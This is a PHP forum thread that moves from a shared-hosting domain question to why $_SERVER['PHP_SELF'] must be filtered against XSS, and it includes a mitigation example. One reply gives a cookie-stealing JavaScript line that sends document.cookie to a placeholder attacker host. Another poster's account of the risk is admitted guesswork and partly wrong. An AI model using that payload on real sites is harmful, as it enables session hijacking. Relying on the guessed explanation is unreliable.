DNS and IP question

alex.barylski
DevNet Evangelist
Posts: 6267
Joined: Tue Dec 21, 2004 5:00 pm
Location: Winnipeg

DNS and IP question

Post by alex.barylski »

I just purchased a new shared host and did so by using some fake domain (something.com or something...) and my hosting company indeed used that name when they created my hosting account...

Now I don't NEED a domain name just the shared host and I figured I'd simply use the IP.

Obviously my software doesn't use any hardcoded URL and relies solely on

$_SERVER['PHP_SELF'] or whatever that variable is (I can't remember)...

Whenever I type in my IP addy and click on a link, I get redirected to that stupid domain name and my software doesn't exist on that domain...

Can I get the hosting company to somehow disable that redirect?

Do I have to use a hardcoded URL in place of that variable?

Should I just purchase a domain name and use it???

Cheers :)
R4000
Forum Contributor
Posts: 168
Joined: Wed Mar 08, 2006 12:50 pm
Location: Cambridge, United Kingdom

Post by R4000 »

you have 4 options:
(I recommend 2 :))
  1. Hardcode the IP.
  2. Get a new host with a real domain.
  3. Buy the domain.
  4. Or ask your hosting company to give you a subdomain of their domain.
Maugrim_The_Reaper
DevNet Master
Posts: 2704
Joined: Tue Nov 02, 2004 5:43 am
Location: Ireland

Post by Maugrim_The_Reaper »

A domain name maps to an IP (or at least one which will redirect to a shared IP's virtual host). Check you actually have your own dedicated IP for your account. It's not a given and may require a small additional charge.

$_SERVER['PHP_SELF'] - make sure you filter this ;)
timvw
DevNet Master
Posts: 4897
Joined: Mon Jan 19, 2004 11:11 pm
Location: Leuven, Belgium

Post by timvw »

You can get a ton of free (sub) domains... eg: no-ip.info
Bill H
DevNet Resident
Posts: 1136
Joined: Sat Jun 01, 2002 10:16 am
Location: San Diego CA

Post by Bill H »

$_SERVER['PHP_SELF'] - make sure you filter this
Not to sound stupid, merely ignorant, but can you amplify on that?
alex.barylski
DevNet Evangelist
Posts: 6267
Joined: Tue Dec 21, 2004 5:00 pm
Location: Winnipeg

Post by alex.barylski »

Bill H wrote:
$_SERVER['PHP_SELF'] - make sure you filter this
Not to sound stupid, merely ignorant, but can you amplify on that?
I'm curious too...

I assume that maybe it's because the value is stored in HTTP headers which can be spoofed...

If I am right, however, I still fail to see why anyone would do such a thing...

It's not like spoofing IP addresses when trying to avoid IP ban scripts or FORM submission when a web site only uses Javascript validation...

So yes, I'm curious too...why and when would you filter that server variable??? :?
timvw
DevNet Master
Posts: 4897
Joined: Mon Jan 19, 2004 11:11 pm
Location: Leuven, Belgium

Post by timvw »

Hockey wrote:
Bill H wrote:
$_SERVER['PHP_SELF'] - make sure you filter this
Not to sound stupid, merely ignorant, but can you amplify on that?
I'm curious too...

I assume that maybe it's because the value is stored in HTTP headers which can be spoofed...
I believe the problem is that many people choose to use PHP_SELF as value for the action attribute in a form tag.
The problem is that without validation it's possible for an attacker to use that form for an XSS attack.
alex.barylski
DevNet Evangelist
Posts: 6267
Joined: Tue Dec 21, 2004 5:00 pm
Location: Winnipeg

Post by alex.barylski »

timvw wrote:
Hockey wrote:
Bill H wrote: Not to sound stupid, merely ignorant, but can you amplify on that?
I'm curious too...

I assume that maybe it's because the value is stored in HTTP headers which can be spoofed...
I believe the problem is that many people choose to use PHP_SELF as value for the action attribute in a form tag.
The problem is that without validation it's possible for an attacker to use that form for an XSS attack.
Ahhhhhhh...ok...well that's valid 8)

However, my CMS application is, at current time for a single user only and "every" action requires at least basic authentication - not incredibly secure, but given the circumstances it should be good enough.

Thanks for that heads up though, never even considered that before :)

Cheers :)
Bill H
DevNet Resident
Posts: 1136
Joined: Sat Jun 01, 2002 10:16 am
Location: San Diego CA

Post by Bill H »

The problem is that without validation it's possible for an attacker to use that form for an XSS attack.
The ignorance (stupidity?) continues.
What would that validation consist of to prevent that?
alex.barylski
DevNet Evangelist
Posts: 6267
Joined: Tue Dec 21, 2004 5:00 pm
Location: Winnipeg

Post by alex.barylski »

Bill H wrote:
The problem is that without validation it's possible for an attacker to use that form for an XSS attack.
The ignorance (stupidity?) continues.
What would that validation consist of to prevent that?
I'm no expert in web security, but...

I'm guessing PHP_SELF is initialized by looking at the script name stored in HTTP headers...

So I imagine that using SCRIPT_NAME or __FILE__ or something similar would be better, because they're likely initialized on the server, by the server, using environment variables, preventing outside tampering...

Would be my guess anyways... :P

I'm not totally clear on how XSS works, but I'm pretty sure it works like:

You use a variable like: PHP_SELF inside FORM elements action attribute.

You don't hardcode the URL but simply do...

<form action="<?=$_SERVER['PHP_SELF'];?>">
 <!-- ...various input elements, etc... -->
</form>
Someone could potentially use your web site now to carry out DoS attacks on another site...

All they would have to do is spoof PHP_SELF to something like: http://www.somedomain.com and submit that web site FORM which would send an HTTP GET/POST request to http://www.somedomain.com instead of the intended website...

http://www.somedomain.com would then have a log of your web site sending abnormal amounts of requests to their web site, meanwhile you haven't done F' all but still get in trouble...and the script kiddy walks because he spoofs his own IP when calling your troubled script...

This is what I am guessing anyways...

If a script kiddy found enough sites with holes like this they could then possibly carry out DDoS attacks...which is more of a threat...

So I guess comparing PHP_SELF to SCRIPT_NAME or hardcoding a URL and just appending PHP_SELF to it would likely fix that problem...

Of course this is all an educated guess...so if I'm wrong someone jump in and correct me...

I'm curious :)

P.S. - www.codeproject.com was hacked by a javascript programmer...the message forums allowed javascript and somehow someone figured out how to get a script to execute when their message was displayed...so they changed the URLs of the adBanners to some pornographic ad banners instead...whenever someone read their message or entire thread I think it was :P

Bored or what??? Who thinks of these things 8)
timvw
DevNet Master
Posts: 4897
Joined: Mon Jan 19, 2004 11:11 pm
Location: Leuven, Belgium

Post by timvw »

I found the comments in http://shiflett.org/archive/98 quite informative...

Anyway, the easiest exploit I can think of is simply injecting some javascript like this:

window.location = 'http://evil.example.org/attack.php?cookie=' + document.cookie 
Now attack.php knows the session_id and can easily perform actions on behalf of the victim.

feyd | fixed to [syntax] tag
Bill H
DevNet Resident
Posts: 1136
Joined: Sat Jun 01, 2002 10:16 am
Location: San Diego CA

Post by Bill H »

Okay, now I'm going to the head of the "stupid" class, because I still don't have any idea of what is involved in filtering $_SERVER['PHP_SELF'].

Something about comparing it to the script it's running in... If I can do that, why do I need it at all? I'll just use the script name, right?

I have a form in a script that is going to be used by (included in) several different other scripts, thereby becoming part of the script that included it. Obviously, the <form> tag needs a differing "action" depending on the script that called it. It seems that $_SERVER['PHP_SELF'] is pretty much the obvious choice for that purpose, but you say I then need to "filter" that. Where do I filter it, what is meant by filtering it, and how do I go about doing it?
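
The filtering asked about above, as an added example that is not part of the thread: `PHP_SELF` is the script path plus any trailing path info from the request URL, so a form action is safer built from `SCRIPT_NAME` and HTML-escaped on output. The function names and the sample request values below are constructed for illustration.

```php
<?php
// Added example, not code from the thread. All sample values are constructed.

/**
 * Return a value that is safe to place inside action="...".
 * SCRIPT_NAME is the path of the executing script without the trailing
 * PATH_INFO that PHP_SELF carries; escaping covers whatever is left.
 * For an included form this is still the path of the including script.
 */
function form_action(array $server): string
{
    $path = $server['SCRIPT_NAME'] ?? '';
    return htmlspecialchars($path, ENT_QUOTES, 'UTF-8');
}

/** Escape-only variant for code that has to keep PHP_SELF (PATH_INFO routing). */
function escaped_php_self(array $server): string
{
    return htmlspecialchars($server['PHP_SELF'] ?? '', ENT_QUOTES, 'UTF-8');
}

// Constructed request: /contact.php/"><b>injected</b>
// The part after the script name arrives in PATH_INFO and in PHP_SELF.
$server = [
    'SCRIPT_NAME' => '/contact.php',
    'PATH_INFO'   => '/"><b>injected</b>',
    'PHP_SELF'    => '/contact.php/"><b>injected</b>',
];

// Unfiltered: the quote in the URL closes the attribute and the rest
// of the path is emitted as markup of its own.
$unsafe = '<form action="' . $server['PHP_SELF'] . '">';

// Escaped: the same bytes stay inside the attribute value as text.
$escaped = '<form action="' . escaped_php_self($server) . '">';

// SCRIPT_NAME plus escaping: the request-supplied suffix is gone entirely.
$fixed = '<form action="' . form_action($server) . '">';

echo $unsafe, PHP_EOL;
echo $escaped, PHP_EOL;
echo $fixed, PHP_EOL;
```

In a real page, pass `$_SERVER` to either function at the point where the form tag is written out.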
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

It may be best to split this thread apart, one for PHP_SELF, and the rest stay. Anyone disagree?
Bill H
DevNet Resident
Posts: 1136
Joined: Sat Jun 01, 2002 10:16 am
Location: San Diego CA

Post by Bill H »

Well, that was very polite, considering that I have brutally hijacked the thread about six nautical miles away from the original topic. It was not deliberate. Hmmm. PHP Code perhaps? I'll post it there.